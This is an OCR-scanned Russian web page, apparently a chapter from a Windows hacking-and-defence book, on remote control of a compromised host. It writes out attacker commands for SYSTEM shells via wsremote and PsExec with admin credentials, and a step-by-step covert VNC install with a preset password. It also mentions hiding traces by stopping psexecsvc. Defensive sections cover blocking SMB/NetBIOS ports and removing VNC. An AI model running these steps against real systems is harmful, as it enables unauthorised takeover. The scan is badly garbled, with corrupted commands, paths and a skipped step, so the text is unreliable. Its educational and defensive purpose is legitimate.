На главную | Содержание | Назад | Вперёд
Наши друзья

 

 

Программа wsremote

В пакете Windows 2000 Resource Kit есть еше одна программа, аналогичная remote . exe, — это утилита wsremote. Сначала запустим wsremote на атакуемой машине (в данном примере это система 192 .168 . 0 . 5) с помощью утилиты soon,
C:\victim>eoon Wvictin wormote /3 "cmd.exe" 5005
Теперь подключимся к ней с машины атакующего, воспользовавшись утилитой wsremote в режиме клиента, при этом необходимо использовать порт, указанный при уста­новке сервера(в нашем примере это порт 5005):
С; \attacker>weremote /с 192.168.0.5 5005
■**«*«*******4**«-********************я*
*********** WSREMOTE ****#*яяя*-я
*********** CLIENT (IP) ******^*,"'■'■,^■
************Я**Я********Я**Я-Я*ЯЯЯЯ,1-**-*
Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp.
C:\winnt\system32>whoami /«11
whoami /all
[User] -  "NT AUTHORITY\SYSTEM" S-l-5-18
[Group    1]   =  -BUILTINNAdministrators" S-l-5-32-544 [Group    2] = "Everyone" S-l-1-0
[Group    3) = "NT AUTHORITYAAuthenticated Users- S-l-5-11 [etc.]
Чтобы показать, что командный интерпретатор работает в контексте учетной записи SYSTEM и не имеет идентификатора INTERACTIVE, была использована утилита whoami из пакета Resource Kit.
Программа PsExec
Программа'wsremote делает жизнь хакера довольно комфортной, но PsExec превосходит даже эту программу. Когда PsExec запускается из командной строки на удаленной системе хаке­ра (при наличии доступа с помощью службы SMB к атакуемому компьютеру), она просто позво­ляет запускать команды на удаленной машине. При вводе в качестве команды cmd. exe откры­вается командный интерпретатор удаленной системы. Поскольку программа незаметно уста­навливает службу на удаленной машине, для хакера все происходит легко и просто. В следую­щем примере мы сначала устанавливаем соединение с атакуемым сервером 192.168.0.5, используя привилегии администратора (не забывайте наше условие, что к этому моменту нам известны аутентификационные данные для учетной записи администратора).
C:\>net use W192.16Э.0.5\ipc$ password /и:administrator
The command completed successfully.
Затем мы запускаем PsExec и файл cmd. exe.
СЛ>рвехес W192.168 .0.5 cmd.exe
PsExec vl.3 - execute processes remotely Copyright (C) 2001 Mark Russinovich www.sysinternals.com Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp.
С:\WINDOWS\system32>
Вуаля! Командный интерпретатор удаленной системы. Как показано ниже, программа PsExec может принимать аргументы командной строки, если есть необходимость ввести ау­тентификационные данные администратора "одним махом".
C:\>peexec \\192.168.0.Б -u administrator  -р password cmd.exa
"'т !-'п'.~п". 'г-    1"   '   ''^^^ЩЩ^^Щщттафя.   -. и
Использование аргумента -s позволяет запускать команды от имени LocalSyslem (в пре­дыдущем примере просто добавьте аргумент - s к cmd. exe).
Программа PsExec запускает psexecsvc на атакуемой машине, что может быть замечено внимательным администратором. Интересно, что можно остановить psexecsvc без какого-либо ущерба своему командному интерпретатору, поэтому хакеры могут исп' методдля скрытия своих следов.

Меры противодействия управлению системой


через командную строку

Бюллетень

Нет

BID

Нет

Исправлено в SP

Нет

Фиксируется

Нет

Как говорят в Microsoft, "это не ошибка, это функция программы". Мы пока не разгова­ривали с руководителями проекта по созданию утилит из набора Microsoft Windows Resource Kit, но уверены, что ни одна из них не была предназначена для использования хакерами в не­благовидных целях. Но история доказала, что в злых целях используются даже технологии, разрабатываемые с наилучшими намерениями.
Лучший способ не дать злоумышленнику возможности управлять системой через команд­ную строку прост: запретите административное управление системой! В этом поможет огра­ничение доступа к NetBIOS через порт TCP/IP (ТСР-порт 139) или к SMB через порт TCP (ТСР-порт 445). Ниже показано, что в системе Windows Server 2003 по умолчанию открыто множество портов. С-.\> netstat -nao
.
Active Connections
Proto
TCP
TCP
TCP
TCP
TCP
UDP
UDP
UDP
UDP
UDP
UDP
UDP
Local Address Foreign Address
0.0.0.0:135 0.0.0.0:0
0.0.0.0:445 0.0.0.0:0
0.0.0.0:1025 0.0.0.0:0
0.0.0.0:1026 0.0.0.0:0
192.168.0.5:139 0.0.0.0:0
0.0.0.0:445 *:*
.0.0:500 *:*
.0.0:4500 *:*
State
LISTENING
LISTENING
LISTENING
LISTENING
LISTENING
0.0. 0.0 .
192.168.0.5:123 192 .168.0.5:137 192.168.0.5:138 127.0.0.1:123
PID 696 4
972 524 4 4
524
524
972
4
4
Э72
Существует множество методов заблокировать эти порты для внешнего доступа. Первый путь (заблокировать ТСР-порт 139) можно представить в виде следующей последовательно­сти действий.
1. В меню Start (Пуск) щелкните правой кнопкой мыши на элементе My Computer (Мой компьютер) и выберите Properties (Свойства).
2. Откройте вкладку Hardware (Оборудование).
3. Щелкните на кнопке Device Manager (Диспетчер устройств).
4. В меню View (Вид) выберите команду Show Hidden Device (Показать скрытые уст­ройства).
5. Откройте узел Non-Plug and Play Drivers (Драйверы устройств не Plug and Play).
6. Щелкните правой кнопкой мыши на пункте Netbios Over TCP/IP (NetBIOS через TCP/IP) и выберите Properties (Свойства).
7. На вкладке General (Общие) откройте раскрывающийся список Device Usage (Применение устройства) и выберите пункт Do Not Use This Device (Disable) (Это устройство не используется (Отключено)).
8. Щелкните на кнопке ОК.
9. Перезагрузите компьютер.
НД ЗДНЕТКУ
Не забывайте, что отключение WINS в системе приведет к запрету любых со­единений к системе, совместного использования файлов и принтеров.
Теперь рассмотрим последовательность действий для блокирования ТСР-порта 445 (SMB over TCP/IP).
1. Запустите Registry Editor (Редактор реестра). Для этого в меню Start (Пуск) выберите пункт Run (Выполнить) и введите строку regedit. exe.
2. Откройте параметр реестра HKLM\SYSTEMVCurrentControlSet\Services\NetBT\ Parameters\TransportBindName.
4. Перезагрузите компьютер.
После блокирования потенциально опасных портов (ТСР-порты 139 и 445) можно прове­рить правильность выполненных действий с помощью команды netstat -nao и убедиться, что на данные порты не ожидается установки соединений, как показано ниже.
С:\> netstat -nao
Active Connections
Proto Local Address
TCP 0.0.0.0:135
TCP 0.0.0.0:1025
TCP 0.0.0.0:1026
UDP 0.0.0.0:500
UDP 0.0.0.0:4500
UDP 192.168.0.5:123
UDP 127.0.0.1:123
Foreign. Address 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0
State LISTENING LISTENING LISTENING
PID 696 972 524 524 524 972 972
НА ЗАМЕТКУ
Если система используется для монтирования совместно используемых раз­делов диска, многие из приведенных выше действий приведут к утрате этой функции. В качестве альтернативы блокирования портов мы рекомендуем применять фильтры IPSec или персональные брандмауэры, для управления соединениями и доступом к портам и ресурсам. Еще одним вариантом явля­ется полное блокирование протокола NetBIOS в системах Windows 2000 с по­мощью персонального брандмауэра. Сейчас создано множество различных программных брандмауэров. Мы предпочитаем WinRoute Professional от


Kerios и Personal Firewall от Tiny Software.

 

 

 

 

 

 

 

] Помните, что блокирование портов 139 и 445 не гарантируез

безопасной рабо-

ты. Если злоумышленник может производить загрузку в системе и исполнять в ней файлы, то блокировка ТСР-портов 139 и 445 или любых других стандарт­ных портов Windows ничего не даст для защиты от атаки.
Управление системой через графический интерфейс
Тогда как большинство хакеров удовлетворяются управлением атакуемой системой через командную строку, для истинных поклонников Windows это всего лишь полдела. Конечной целью любого настоящего хакера Windows является получение полного графического кон­троля над системой, который дает те же возможности, что и непосредственное пребывание за клавиатурой чужого компьютера.
Удаленная работа через графический интерфейс


Популярность

 

7

 

Простота

9

 

Опасность

 

9

 

Степень риска

 

8

 

Одна из лучших методик удаленной работы через графический интерфейс включает ис­пользование программы Virtual Network Computing (VNC) производства AT&T Research Laboratories, Кэмбридж, Англия. Программа VNC имеет маленький размер, развитые функ­ции удаленного управления системой, как у программы PCAnywhere производства компании Symantec. Для удаленного запуска программы VNC требуется немного поработать вручную, но зато результаты будут просто потрясающими.
Прежде всего, убедитесь в том, что ваш административный ресурс остался нетронутым и установлен сеанс работы с удаленной системой через командную строку. Затем выполните следующие действия.
h Создайте файл winvnc. ini следующего содержимого (это позволит установить па­роль "secret" для защиты подключения к VNC).
HKEY_USERS\-DEFAULT So ftware\ORL\WinWC3 SocketConnect = REG_DWORD 0x00000001
Password = REG„BINARY 0x00000008 0x57bf2d2e 0x9e6cb06e
2. Скопируйте на атакуемую систему следующие файл ы.
С:\>сору regini.exe d:\windowa\systeni32 С:\>сору wlnvnc.ini d:\windows\sysEem32 С:\>сору winvnc.оке d:\windows\sysEem32 С:\>сору vachooka.dll d:\windows\syHfceni32 c:\>copy omnitbread_rt.dll d:\wiadoWB\systam32
3. Добавьте свои настройки из файла winvnc. ini в реестр.
I
c:\>reg±ni -ш \\192.168.0.5 winvnc.ini
4. Установите службу winvnc из командной строки удаленной системы.
Remote c:\>winvnc -in»ta.ll
5. Запустите службу.
Remote c:\>net fltart winvnc
6. Из своей системы запустите приложение vncviewer, которое поставляется в наборе, и направьте его на вашу цель, 192.168.0.5:0 ("0" здесь обозначает монитор). Вве­дите пароль secret, после чего будет предоставлен графический интерфейс для сис­темы, с полным эффектом физического присутствия перед монитором удаленной ма­шины. Чтобы использовать Java-версию графического интерфейса, нужно подключить браузер к порту 5800.
http:// 192.163.0.5:5800
Защита от удаленного использования графического интерфейса


Бюллетень

Нет

BID

Нет

Исправлено в SP

Нет

Фиксируется

Нет


Для блокирования этого уязвимого места опять-таки необходимо любой ценой ограничить ад­министративный контроль над системой. Проше всего использовать персональный брандмауэр, например, программу WinRoute Professional или Personal Firewall производства компании Tiny Software, чтобы ограничить попытки входящих подключений к портам.
Для выявления соединений VNC, как и соединений remote. exe или netcat, можно ис­пользовать средства, описанные в предыдущем разделе, в том. числе и программу Vision от компании Foundstone. Если вам не повезло, и в вашей системе выявлено присутствие хакера, с помощью программы Vision можно уничтожить соединение и удалить создавшую его про­грамму, выполнив следующие действия.
C:\>net atop winvnc С: \winvnc -remove
C:\>reg delete HKEl_l/X:AljJif^ira\Sy«tem\&irren^ % U1S2.16B.0.S

 

На главную | Содержание | Назад | Вперёд
 
Яндекс.Метрика